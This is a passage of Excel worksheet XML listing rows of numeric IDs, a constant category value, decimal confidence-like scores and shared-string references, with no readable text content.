        <v>5592</v>
      </c>
      <c r="G3516" t="s">
        <v>6952</v>
      </c>
      <c r="H3516" t="s">
        <v>6953</v>
      </c>
    </row>
    <row r="3517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3517" s="1">
        <v>3515</v>
      </c>
      <c r="B3517">
        <v>6066</v>
      </c>
      <c r="C3517">
        <v>6066</v>
      </c>
      <c r="D3517">
        <v>2</v>
      </c>
      <c r="E3517">
        <v>0.64020001888275146</v>
      </c>
      <c r="F3517" t="s">
        <v>5592</v>
      </c>
      <c r="G3517" t="s">
        <v>6954</v>
      </c>
      <c r="H3517" t="s">
        <v>6955</v>
      </c>
    </row>
    <row r="3518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3518" s="1">
        <v>3516</v>
      </c>
      <c r="B3518">
        <v>5203</v>
      </c>
      <c r="C3518">
        <v>5203</v>
      </c>
      <c r="D3518">
        <v>2</v>
      </c>
      <c r="E3518">
        <v>0.98240000009536743</v>
      </c>
      <c r="F3518" t="s">
        <v>5592</v>
      </c>
      <c r="G3518" t="s">
        <v>6956</v>
      </c>
      <c r="H3518" t="s">
        <v>6957</v>
      </c>
    </row>
    <row r="3519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3519" s="1">
        <v>3517</v>
      </c>
      <c r="B3519">
        <v>4359</v>
      </c>
      <c r="C3519">
        <v>4359</v>
      </c>
      <c r="D3519">
        <v>2</v>
      </c>
      <c r="E3519">
        <v>0.60199999809265137</v>
      </c>
      <c r="F3519" t="s">
        <v>5592</v>
      </c>
      <c r="G3519" t="s">
        <v>6958</v>
      </c>
      <c r="H3519" t="s">
        <v>6959</v>
      </c>
    </row>
    <row r="3520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3520" s="1">
        <v>3518</v>
      </c>
      <c r="B3520">
        <v>5202</v>
      </c>
      <c r="C3520">
        <v>5202</v>
      </c>
      <c r="D3520">
        <v>2</v>
      </c>
      <c r="E3520">
        <v>0.7750999927520752</v>
      </c>
      <c r="F3520" t="s">
        <v>5592</v>
      </c>
      <c r="G3520" t="s">
        <v>6960</v>
      </c>
      <c r="H3520" t="s">
        <v>6961</v>
      </c>
    </row>
    <row r="3521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3521" s="1">
        <v>3519</v>
      </c>
      <c r="B3521">
        <v>5731</v>
      </c>
      <c r="C3521">
        <v>5731</v>
      </c>
      <c r="D3521">
        <v>2</v>
      </c>
      <c r="E3521">
        <v>0.76120001077651978</v>
      </c>
      <c r="F3521" t="s">
        <v>5592</v>
      </c>
      <c r="G3521" t="s">
        <v>6962</v>
      </c>
      <c r="H3521" t="s">
        <v>6963</v>
      </c>
    </row>
    <row r="3522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3522" s="1">
        <v>3520</v>
      </c>
      <c r="B3522">
        <v>6074</v>
      </c>
      <c r="C3522">
        <v>6074</v>
      </c>
      <c r="D3522">
        <v>2</v>
      </c>
      <c r="E3522">
        <v>0.52700001001358032</v>
      </c>
      <c r="F3522" t="s">
        <v>5592</v>
      </c>
      <c r="G3522" t="s">
        <v>6964</v>
      </c>
      <c r="H3522" t="s">
        <v>6965</v>
      </c>
    </row>
    <row r="3523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3523" s="1">
        <v>3521</v>
      </c>
      <c r="B3523">
        <v>6075</v>
      </c>
      <c r="C3523">
        <v>6075</v>
      </c>
      <c r="D3523">
        <v>2</v>
      </c>
      <c r="E3523">
        <v>0.61330002546310425</v>
      </c>
      <c r="F3523" t="s">
        <v>5592</v>
      </c>
      <c r="G3523" t="s">
        <v>6966</v>
      </c>
      <c r="H3523" t="s">
        <v>6967</v>
      </c>
    </row>
    <row r="3524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3524" s="1">
        <v>3522</v>
      </c>
      <c r="B3524">
        <v>6076</v>
      </c>
      <c r="C3524">
        <v>6076</v>
      </c>
      <c r="D3524">
        <v>2</v>
      </c>
      <c r="E3524">
        <v>0.44170001149177551</v>
      </c>
      <c r="F3524" t="s">
        <v>5592</v>
      </c>
      <c r="G3524" t="s">
        <v>6968</v>
      </c>
      <c r="H3524" t="s">
        <v>6969</v>
      </c>
    </row>
    <row r="3525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3525" s="1">
        <v>3523</v>
      </c>
      <c r="B3525">
        <v>6096</v>
      </c>
      <c r="C3525">
        <v>6096</v>
      </c>
      <c r="D3525">
        <v>2</v>
      </c>
      <c r="E3525">
        <v>0.98830002546310425</v>
      </c>
      <c r="F3525" t="s">
        <v>5592</v>
      </c>
      <c r="G3525" t="s">
        <v>6970</v>
      </c>
      <c r="H3525" t="s">
        <v>6971</v>
      </c>
    </row>
    <row r="3526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3526" s="1">
        <v>3524</v>
      </c>
      <c r="B3526">
        <v>4317</v>
      </c>
      <c r="C3526">
        <v>4317</v>
      </c>
      <c r="D3526">
        <v>2</v>
      </c>
      <c r="E3526">
        <v>0.64240002632141113</v>
      </c>
      <c r="F3526" t="s">
        <v>5592</v>
      </c>
      <c r="G3526" t="s">
        <v>6972</v>
      </c>
      <c r="H3526" t="s">
        <v>6973</v>
      </c>
    </row>
    <row r="3527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3527" s="1">
        <v>3525</v>
      </c>
      <c r="B3527">
        <v>6088</v>
      </c>
      <c r="C3527">
        <v>6088</v>
      </c>
      <c r="D3527">
        <v>2</v>
      </c>
      <c r="E3527">
        <v>0.72049999237060547</v>
      </c>
      <c r="F3527" t="s">
        <v>5592</v>
      </c>
      <c r="G3527" t="s">
        <v>6974</v>
      </c>
      <c r="H3527" t="s">
        <v>6975</v>
      </c>
    </row>
    <row r="3528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3528" s="1">
        <v>3526</v>
      </c>
      <c r="B3528">
        <v>5227</v>
      </c>
      <c r="C3528">
        <v>5227</v>
      </c>
      <c r="D3528">
        <v>2</v>
      </c>
      <c r="E3528">
        <v>0.99709999561309814</v>
      </c>
      <c r="F3528" t="s">
        <v>5592</v>
      </c>
      <c r="G3528" t="s">
        <v>6976</v>
      </c>
      <c r="H3528" t="s">
        <v>6977</v>
      </c>
    </row>
    <row r="3529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3529" s="1">
        <v>3527</v>
      </c>
      <c r="B3529">
        <v>5226</v>
      </c>
      <c r="C3529">
        <v>5226</v>
      </c>
      <c r="D3529">
        <v>2</v>
      </c>
      <c r="E3529">
        <v>0.97350001335144043</v>
      </c>
      <c r="F3529" t="s">
        <v>5592</v>
      </c>
      <c r="G3529" t="s">
        <v>6978</v>
      </c>
      <c r="H3529" t="s">
        <v>6979</v>
      </c>
    </row>
    <row r="3530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3530" s="1">
        <v>3528</v>
      </c>
      <c r="B3530">
        <v>5225</v>
      </c>
      <c r="C3530">
        <v>5225</v>
      </c>
      <c r="D3530">
        <v>2</v>
      </c>
      <c r="E3530">
        <v>0.69199997186660767</v>
      </c>
      <c r="F3530" t="s">
        <v>5592</v>
      </c>
      <c r="G3530" t="s">
        <v>6980</v>
      </c>
      <c r="H3530" t="s">
        <v>6981</v>
      </c>
    </row>
    <row r="3531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3531" s="1">
        <v>3529</v>
      </c>
      <c r="B3531">
        <v>4328</v>
      </c>
      <c r="C3531">
        <v>4328</v>
      </c>
      <c r="D3531">
        <v>2</v>
      </c>
      <c r="E3531">
        <v>0.99739998579025269</v>
      </c>
      <c r="F3531" t="s">
        <v>5592</v>
      </c>
      <c r="G3531" t="s">
        <v>6982</v>
      </c>
      <c r="H3531" t="s">
        <v>6983</v>
      </c>
    </row>
    <row r="3532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3532" s="1">
        <v>3530</v>
      </c>
      <c r="B3532">
        <v>5201</v>
      </c>
      <c r="C3532">
        <v>5201</v>
      </c>
      <c r="D3532">
        <v>2</v>
      </c>
      <c r="E3532">
        <v>0.67809998989105225</v>
      </c>
      <c r="F3532" t="s">
        <v>5592</v>
      </c>
      <c r="G3532" t="s">
        <v>6984</v>
      </c>
      <c r="H3532" t="s">
        <v>6985</v>
      </c>
    </row>
    <row r="3533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3533" s="1">
        <v>3531</v>
      </c>
      <c r="B3533">
        <v>5221</v>
      </c>
      <c r="C3533">
        <v>5221</v>
      </c>
      <c r="D3533">
        <v>2</v>
      </c>
      <c r="E3533">
        <v>0.99930000305175781</v>
      </c>
      <c r="F3533" t="s">
        <v>5592</v>
      </c>
      <c r="G3533" t="s">
        <v>6986</v>
      </c>
      <c r="H3533" t="s">
        <v>6779</v>
      </c>
    </row>
    <row r="3534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3534" s="1">
        <v>3532</v>
      </c>
      <c r="B3534">
        <v>5728</v>
      </c>
      <c r="C3534">
        <v>5728</v>
      </c>
      <c r="D3534">
        <v>2</v>
      </c>
      <c r="E3534">
        <v>0.81120002269744873</v>
      </c>
      <c r="F3534" t="s">
        <v>5592</v>
      </c>
      <c r="G3534" t="s">
        <v>6987</v>
      </c>
      <c r="H3534" t="s">
        <v>6988</v>
      </c>
    </row>
    <row r="3535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3535" s="1">
        <v>3533</v>
      </c>
      <c r="B3535">
        <v>6080</v>
      </c>
      <c r="C3535">
        <v>6080</v>
      </c>
      <c r="D3535">
        <v>2</v>
      </c>
      <c r="E3535">
        <v>0.51179999113082886</v>
      </c>
      <c r="F3535" t="s">
        <v>5592</v>
      </c>
      <c r="G3535" t="s">
        <v>6989</v>
      </c>
      <c r="H3535" t="s">
        <v>6990</v>
      </c>
    </row>
    <row r="3536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3536" s="1">
        <v>3534</v>
      </c>
      <c r="B3536">
        <v>6079</v>
      </c>
      <c r="C3536">
        <v>6079</v>
      </c>
      <c r="D3536">
        <v>2</v>
      </c>
      <c r="E3536">
        <v>0.50400000810623169</v>
      </c>
      <c r="F3536" t="s">
        <v>5592</v>
      </c>
      <c r="G3536" t="s">
        <v>6991</v>
      </c>
      <c r="H3536" t="s">
        <v>6992</v>
      </c>
    </row>
    <row r="3537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3537" s="1">
        <v>3535</v>
      </c>
      <c r="B3537">
        <v>4339</v>
      </c>
      <c r="C3537">
        <v>4339</v>
      </c>
      <c r="D3537">
        <v>2</v>
      </c>
      <c r="E3537">
        <v>0.99790000915527344</v>
      </c>
      <c r="F3537" t="s">
        <v>5592</v>
      </c>
      <c r="G3537" t="s">
        <v>6993</v>
      </c>
      <c r="H3537" t="s">
        <v>6994</v>
      </c>
    </row>
    <row r="3538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3538" s="1">
        <v>3536</v>
      </c>
      <c r="B3538">
        <v>6078</v>
      </c>
      <c r="C3538">
        <v>6078</v>
      </c>
      <c r="D3538">
        <v>2</v>
      </c>
      <c r="E3538">
        <v>0.86000001430511475</v>
      </c>
      <c r="F3538" t="s">
        <v>5592</v>
      </c>
      <c r="G3538" t="s">
        <v>6995</v>
      </c>
      <c r="H3538" t="s">
        <v>6996</v>
      </c>
    </row>
    <row r="3539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3539" s="1">
        <v>3537</v>
      </c>
      <c r="B3539">
        <v>5214</v>
      </c>
      <c r="C3539">
        <v>5214</v>
      </c>
      <c r="D3539">
        <v>2</v>
      </c>
      <c r="E3539">
        <v>0.99629998207092285</v>
      </c>
      <c r="F3539" t="s">
        <v>5592</v>
      </c>
      <c r="G3539" t="s">
        <v>6997</v>
      </c>
      <c r="H3539" t="s">
        <v>6998</v>
      </c>
    </row>
    <row r="3540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3540" s="1">
        <v>3538</v>
      </c>
      <c r="B3540">
        <v>6077</v>
      </c>
      <c r="C3540">
        <v>6077</v>
      </c>
      <c r="D3540">
        <v>2</v>
      </c>
      <c r="E3540">
        <v>0.66809999942779541</v>
      </c>
      <c r="F3540" t="s">
        <v>5592</v>
      </c>
      <c r="G3540" t="s">
        <v>6999</v>
      </c>
      <c r="H3540" t="s">
        <v>7000</v>
      </c>
    </row>
    <row r="3541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3541" s="1">
        <v>3539</v>
      </c>
      <c r="B3541">
        <v>4333</v>
      </c>
      <c r="C3541">
        <v>4333</v>
      </c>
      <c r="D3541">
        <v>2</v>
      </c>
      <c r="E3541">
        <v>0.96530002355575562</v>
      </c>
      <c r="F3541" t="s">
        <v>5592</v>
      </c>
      <c r="G3541" t="s">
        <v>7001</v>
      </c>
      <c r="H3541" t="s">
        <v>7002</v>
      </c>
    </row>
    <row r="3542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3542" s="1">
        <v>3540</v>
      </c>
      <c r="B3542">
        <v>5200</v>
      </c>
      <c r="C3542">
        <v>5200</v>
      </c>
      <c r="D3542">
        <v>2</v>
      </c>
      <c r="E3542">
        <v>0.60119998455047607</v>
      </c>
      <c r="F3542" t="s">
        <v>5592</v>
      </c>
      <c r="G3542" t="s">
        <v>7003</v>
      </c>
      <c r="H3542" t="s">
        <v>7004</v>
      </c>
    </row>
    <row r="3543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3543" s="1">
        <v>3541</v>
      </c>
      <c r="B3543">
        <v>5736</v>
      </c>
      <c r="C3543">
        <v>5736</v>
      </c>
      <c r="D3543">
        <v>2</v>
      </c>
      <c r="E3543">
        <v>0.63559997081756592</v>
      </c>
      <c r="F3543" t="s">
        <v>5592</v>
      </c>
      <c r="G3543" t="s">
        <v>7005</v>
      </c>
      <c r="H3543" t="s">
        <v>7006</v>
      </c>
    </row>
    <row r="3544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3544" s="1">
        <v>3542</v>
      </c>
      <c r="B3544">
        <v>6062</v>
      </c>
      <c r="C3544">
        <v>6062</v>
      </c>
      <c r="D3544">
        <v>2</v>
      </c>
      <c r="E3544">
        <v>0.98509997129440308</v>
      </c>
      <c r="F3544" t="s">
        <v>5592</v>
      </c>
      <c r="G3544" t="s">
        <v>7007</v>
      </c>
      <c r="H3544" t="s">
        <v>7008</v>
      </c>
    </row>
    <row r="3545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3545" s="1">
        <v>3543</v>
      </c>
      <c r="B3545">
        <v>5187</v>
      </c>
      <c r="C3545">
        <v>5187</v>
      </c>
      <c r="D3545">
        <v>2</v>
      </c>
      <c r="E3545">
        <v>0.99709999561309814</v>
      </c>
      <c r="F3545" t="s">
        <v>5592</v>
      </c>
      <c r="G3545" t="s">
        <v>7009</v>
      </c>
      <c r="H3545" t="s">
        <v>7010</v>
      </c>
    </row>
    <row r="3546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3546" s="1">
        <v>3544</v>
      </c>
      <c r="B3546">
        <v>4393</v>
      </c>
      <c r="C3546">
        <v>4393</v>
      </c>
      <c r="D3546">
        <v>2</v>
      </c>
      <c r="E3546">
        <v>0.99720001220703125</v>
      </c>
      <c r="F3546" t="s">
        <v>5592</v>
      </c>
      <c r="G3546" t="s">
        <v>7011</v>
      </c>
      <c r="H3546" t="s">
        <v>7012</v>
      </c>
    </row>
    <row r="3547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3547" s="1">
        <v>3545</v>
      </c>
      <c r="B3547">
        <v>5742</v>
      </c>
      <c r="C3547">
        <v>5742</v>
      </c>
      <c r="D3547">
        <v>2</v>
      </c>
      <c r="E3547">
        <v>0.85490000247955322</v>
      </c>
      <c r="F3547" t="s">
        <v>5592</v>
      </c>
      <c r="G3547" t="s">
        <v>7013</v>
      </c>
      <c r="H3547" t="s">
        <v>7014</v>
      </c>
    </row>
    <row r="3548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3548" s="1">
        <v>3546</v>
      </c>
      <c r="B3548">
        <v>4399</v>
      </c>
      <c r="C3548">
        <v>4399</v>
      </c>
      <c r="D3548">
        <v>2</v>
      </c>
      <c r="E3548">
        <v>0.69599997997283936</v>
      </c>
      <c r="F3548" t="s">
        <v>5592</v>
      </c>
      <c r="G3548" t="s">
        <v>7015</v>
      </c>
      <c r="H3548" t="s">
        <v>7016</v>
      </c>
    </row>
    <row r="3549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3549" s="1">
        <v>3547</v>
      </c>
      <c r="B3549">
        <v>6052</v>
      </c>
      <c r="C3549">
        <v>6052</v>
      </c>
      <c r="D3549">
        <v>2</v>
      </c>
      <c r="E3549">
        <v>0.55110001564025879</v>
      </c>
      <c r="F3549" t="s">
        <v>5592</v>
      </c>
      <c r="G3549" t="s">
        <v>7017</v>
      </c>
      <c r="H3549" t="s">
        <v>7018</v>
      </c>
    </row>
    <row r="3550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3550" s="1">
        <v>3548</v>
      </c>
      <c r="B3550">
        <v>5744</v>
      </c>
      <c r="C3550">
        <v>5744</v>
      </c>
      <c r="D3550">
        <v>2</v>
      </c>
      <c r="E3550">
        <v>0.5932999849319458</v>
      </c>
      <c r="F3550" t="s">
        <v>5592</v>
      </c>
      <c r="G3550" t="s">
        <v>7019</v>
      </c>
      <c r="H3550" t="s">
        <v>7020</v>
      </c>
    </row>
    <row r="3551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3551" s="1">
        <v>3549</v>
      </c>
      <c r="B3551">
        <v>5746</v>
      </c>
      <c r="C3551">
        <v>5746</v>
      </c>
      <c r="D3551">
        <v>2</v>
      </c>
      <c r="E3551">
        <v>0.98900002241134644</v>
      </c>
      <c r="F3551" t="s">
        <v>5592</v>
      </c>
      <c r="G3551" t="s">
        <v>7021</v>
      </c>
      <c r="H3551" t="s">
        <v>7022</v>
      </c>
    </row>
    <row r="3552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3552" s="1">
        <v>3550</v>
      </c>
      <c r="B3552">
        <v>5188</v>
      </c>
      <c r="C3552">
        <v>5188</v>
      </c>
      <c r="D3552">
        <v>2</v>
      </c>
      <c r="E3552">
        <v>0.78939998149871826</v>
      </c>
      <c r="F3552" t="s">
        <v>5592</v>
      </c>
      <c r="G3552" t="s">
        <v>7023</v>
      </c>
      <c r="H3552" t="s">
        <v>7024</v>
      </c>
    </row>
    <row r="3553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3553" s="1">
        <v>3551</v>
      </c>
      <c r="B3553">
        <v>5177</v>
      </c>
      <c r="C3553">
        <v>5177</v>
      </c>
      <c r="D3553">
        <v>2</v>
      </c>
      <c r="E3553">
        <v>0.83190000057220459</v>
      </c>
      <c r="F3553" t="s">
        <v>5592</v>
      </c>
      <c r="G3553" t="s">
        <v>7025</v>
      </c>
      <c r="H3553" t="s">
        <v>7026</v>
      </c>
    </row>
    <row r="3554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3554" s="1">
        <v>3552</v>
      </c>
      <c r="B3554">
        <v>5175</v>
      </c>
      <c r="C3554">
        <v>5175</v>
      </c>
      <c r="D3554">
        <v>2</v>
      </c>
      <c r="E3554">
        <v>0.99370002746582031</v>
      </c>
      <c r="F3554" t="s">
        <v>5592</v>
      </c>
      <c r="G3554" t="s">
        <v>7027</v>
      </c>
      <c r="H3554" t="s">
        <v>7028</v>
      </c>
    </row>
    <row r="3555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3555" s="1">
        <v>3553</v>
      </c>
      <c r="B3555">
        <v>4415</v>
      </c>
      <c r="C3555">
        <v>4415</v>
      </c>
      <c r="D3555">
        <v>2</v>
      </c>
      <c r="E3555">
        <v>0.99519997835159302</v>
      </c>
      <c r="F3555" t="s">
        <v>5592</v>
      </c>
      <c r="G3555" t="s">
        <v>7029</v>
      </c>
      <c r="H3555" t="s">
        <v>7030</v>
      </c>
    </row>
    <row r="3556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3556" s="1">
        <v>3554</v>
      </c>
      <c r="B3556">
        <v>4416</v>
      </c>
      <c r="C3556">
        <v>4416</v>
      </c>
      <c r="D3556">
        <v>2</v>
      </c>
      <c r="E3556">
        <v>0.84859997034072876</v>
      </c>
      <c r="F3556" t="s">
        <v>5592</v>
      </c>
      <c r="G3556" t="s">
        <v>7031</v>
      </c>
      <c r="H3556" t="s">
        <v>7032</v>
      </c>
    </row>
    <row r="3557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3557" s="1">
        <v>3555</v>
      </c>
      <c r="B3557">
        <v>6045</v>
      </c>
      <c r="C3557">
        <v>6045</v>
      </c>
      <c r="D3557">
        <v>2</v>
      </c>
      <c r="E3557">
        <v>0.85280001163482666</v>
      </c>
      <c r="F3557" t="s">
        <v>5592</v>
      </c>
      <c r="G3557" t="s">
        <v>7033</v>
      </c>
      <c r="H3557" t="s">
        <v>7034</v>
      </c>
    </row>
    <row r="3558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3558" s="1">
        <v>3556</v>
      </c>
      <c r="B3558">
        <v>5748</v>
      </c>
      <c r="C3558">
        <v>5748</v>
      </c>
      <c r="D3558">
        <v>2</v>
      </c>
      <c r="E3558">
        <v>0.99970000982284546</v>
      </c>
      <c r="F3558" t="s">
        <v>5592</v>
      </c>
      <c r="G3558" t="s">
        <v>7035</v>
      </c>
      <c r="H3558" t="s">
        <v>7036</v>
      </c>
    </row>
    <row r="3559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3559" s="1">
        <v>3557</v>
      </c>
      <c r="B3559">
        <v>5170</v>
      </c>
      <c r="C3559">
        <v>5170</v>
      </c>
      <c r="D3559">
        <v>2</v>
      </c>
      <c r="E3559">
        <v>0.99599999189376831</v>
      </c>
      <c r="F3559" t="s">
        <v>5592</v>
      </c>
      <c r="G3559" t="s">
        <v>7037</v>
      </c>
      <c r="H3559" t="s">
        <v>7038</v>
      </c>
    </row>
    <row r="3560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3560" s="1">
        <v>3558</v>
      </c>
      <c r="B3560">
        <v>5752</v>
      </c>
      <c r="C3560">
        <v>5752</v>
      </c>
      <c r="D3560">
        <v>2</v>
      </c>
      <c r="E3560">
        <v>0.77060002088546753</v>
      </c>
      <c r="F3560" t="s">
        <v>5592</v>
      </c>
      <c r="G3560" t="s">
        <v>7039</v>
      </c>
      <c r="H3560" t="s">
        <v>7040</v>
      </c>
    </row>
    <row r="3561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3561" s="1">
        <v>3559</v>
      </c>
      <c r="B3561">
        <v>5747</v>
      </c>
      <c r="C3561">
        <v>5747</v>
      </c>
      <c r="D3561">
        <v>2</v>
      </c>
      <c r="E3561">
        <v>0.97740000486373901</v>
      </c>
      <c r="F3561" t="s">
        <v>5592</v>
      </c>
      <c r="G3561" t="s">
        <v>7041</v>
      </c>
      <c r="H3561" t="s">
        <v>7042</v>
      </c>
    </row>
    <row r="3562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3562" s="1">
        <v>3560</v>
      </c>
      <c r="B3562">
        <v>6098</v>
      </c>
      <c r="C3562">
        <v>6098</v>
      </c>
      <c r="D3562">
        <v>2</v>
      </c>
      <c r="E3562">
        <v>0.55540001392364502</v>
      </c>
      <c r="F3562" t="s">
        <v>5592</v>
      </c>
      <c r="G3562" t="s">
        <v>7043</v>
      </c>
      <c r="H3562" t="s">
        <v>7044</v>
      </c>
    </row>
    <row r="3563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3563" s="1">
        <v>3561</v>
      </c>
      <c r="B3563">
        <v>4392</v>
      </c>
      <c r="C3563">
        <v>4392</v>
      </c>
      <c r="D3563">
        <v>2</v>
      </c>
      <c r="E3563">
        <v>0.98919999599456787</v>
      </c>
      <c r="F3563" t="s">
        <v>5592</v>
      </c>
      <c r="G3563" t="s">
        <v>7045</v>
      </c>
      <c r="H3563" t="s">
        <v>7046</v>
      </c>
    </row>
    <row r="3564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3564" s="1">
        <v>3562</v>
      </c>
      <c r="B3564">
        <v>4388</v>
      </c>
      <c r="C3564">
        <v>4388</v>
      </c>
      <c r="D3564">
        <v>2</v>
      </c>
      <c r="E3564">
        <v>0.62980002164840698</v>
      </c>
      <c r="F3564" t="s">
        <v>5592</v>
      </c>
      <c r="G3564" t="s">
        <v>7047</v>
      </c>
      <c r="H3564" t="s">
        <v>7048</v>
      </c>
    </row>
    <row r="3565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3565" s="1">
        <v>3563</v>
      </c>
      <c r="B3565">
        <v>5197</v>
      </c>
      <c r="C3565">
        <v>5197</v>
      </c>
      <c r="D3565">
        <v>2</v>
      </c>
      <c r="E3565">
        <v>0.99709999561309814</v>
      </c>
      <c r="F3565" t="s">
        <v>5592</v>
      </c>
      <c r="G3565" t="s">
        <v>7049</v>
      </c>
      <c r="H3565" t="s">
        <v>7050</v>
      </c>
    </row>
    <row r="3566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3566" s="1">
        <v>3564</v>
      </c>
      <c r="B3566">
        <v>5196</v>
      </c>
      <c r="C3566">
        <v>5196</v>
      </c>
      <c r="D3566">
        <v>2</v>
      </c>
      <c r="E3566">
        <v>0.88779997825622559</v>
      </c>
      <c r="F3566" t="s">
        <v>5592</v>
      </c>
      <c r="G3566" t="s">
        <v>7051</v>
      </c>
      <c r="H3566" t="s">
        <v>7052</v>
      </c>
    </row>
    <row r="3567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3567" s="1">
        <v>3565</v>
      </c>
      <c r="B3567">
        <v>5195</v>
      </c>
      <c r="C3567">
        <v>5195</v>
      </c>
      <c r="D3567">
        <v>2</v>
      </c>
      <c r="E3567">
        <v>0.98350000381469727</v>
      </c>
      <c r="F3567" t="s">
        <v>5592</v>
      </c>
      <c r="G3567" t="s">
        <v>7053</v>
      </c>
      <c r="H3567" t="s">
        <v>7054</v>
      </c>
    </row>
    <row r="3568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3568" s="1">
        <v>3566</v>
      </c>
      <c r="B3568">
        <v>6060</v>
      </c>
      <c r="C3568">
        <v>6060</v>
      </c>
      <c r="D3568">
        <v>2</v>
      </c>
      <c r="E3568">
        <v>0.9976000189781189</v>
      </c>
      <c r="F3568" t="s">
        <v>5592</v>
      </c>
      <c r="G3568" t="s">
        <v>7055</v>
      </c>
      <c r="H3568" t="s">
        <v>7056</v>
      </c>
    </row>
    <row r="3569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3569" s="1">
        <v>3567</v>
      </c>
      <c r="B3569">
        <v>5737</v>
      </c>
      <c r="C3569">
        <v>5737</v>
      </c>
      <c r="D3569">
        <v>2</v>
      </c>
      <c r="E3569">
        <v>0.97899997234344482</v>
      </c>
      <c r="F3569" t="s">
        <v>5592</v>
      </c>
      <c r="G3569" t="s">
        <v>7057</v>
      </c>
      <c r="H3569" t="s">
        <v>7058</v>
      </c>
    </row>
    <row r="3570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3570" s="1">
        <v>3568</v>
      </c>
      <c r="B3570">
        <v>4377</v>
      </c>
      <c r="C3570">
        <v>4377</v>
      </c>
      <c r="D3570">
        <v>2</v>
      </c>
      <c r="E3570">
        <v>0.99970000982284546</v>
      </c>
      <c r="F3570" t="s">
        <v>5592</v>
      </c>
      <c r="G3570" t="s">
        <v>7059</v>
      </c>
      <c r="H3570" t="s">
        <v>7060</v>
      </c>
    </row>
    <row r="3571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3571" s="1">
        <v>3569</v>
      </c>
      <c r="B3571">
        <v>5738</v>
      </c>
      <c r="C3571">
        <v>5738</v>
      </c>
      <c r="D3571">
        <v>2</v>
      </c>
      <c r="E3571">
        <v>0.99959999322891235</v>
      </c>
      <c r="F3571" t="s">
        <v>5592</v>
      </c>
      <c r="G3571" t="s">
        <v>7061</v>
      </c>
      <c r="H3571" t="s">
        <v>7062</v>
      </c>
    </row>
    <row r="3572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3572" s="1">
        <v>3570</v>
      </c>
      <c r="B3572">
        <v>4389</v>
      </c>
      <c r="C3572">
        <v>4389</v>
      </c>
      <c r="D3572">
        <v>2</v>
      </c>
      <c r="E3572">
        <v>0.50220000743865967</v>
      </c>
      <c r="F3572" t="s">
        <v>5592</v>
      </c>
      <c r="G3572" t="s">
        <v>7063</v>
      </c>
      <c r="H3572" t="s">
        <v>7064</v>
      </c>
    </row>
    <row r="3573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3573" s="1">
        <v>3571</v>
      </c>
      <c r="B3573">
        <v>5192</v>
      </c>
      <c r="C3573">
        <v>5192</v>
      </c>
      <c r="D3573">
        <v>2</v>
      </c>
      <c r="E3573">
        <v>0.99650001525878906</v>
      </c>
      <c r="F3573" t="s">
        <v>5592</v>
      </c>
      <c r="G3573" t="s">
        <v>7065</v>
      </c>
      <c r="H3573" t="s">
        <v>7066</v>
      </c>
    </row>
    <row r="3574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3574" s="1">
        <v>3572</v>
      </c>
      <c r="B3574">
        <v>4380</v>
      </c>
      <c r="C3574">
        <v>4380</v>
      </c>
      <c r="D3574">
        <v>2</v>
      </c>
      <c r="E3574">
        <v>0.98849999904632568</v>
      </c>
      <c r="F3574" t="s">
        <v>5592</v>
      </c>
      <c r="G3574" t="s">
        <v>7067</v>
      </c>
      <c r="H3574" t="s">
        <v>7068</v>
      </c>
    </row>
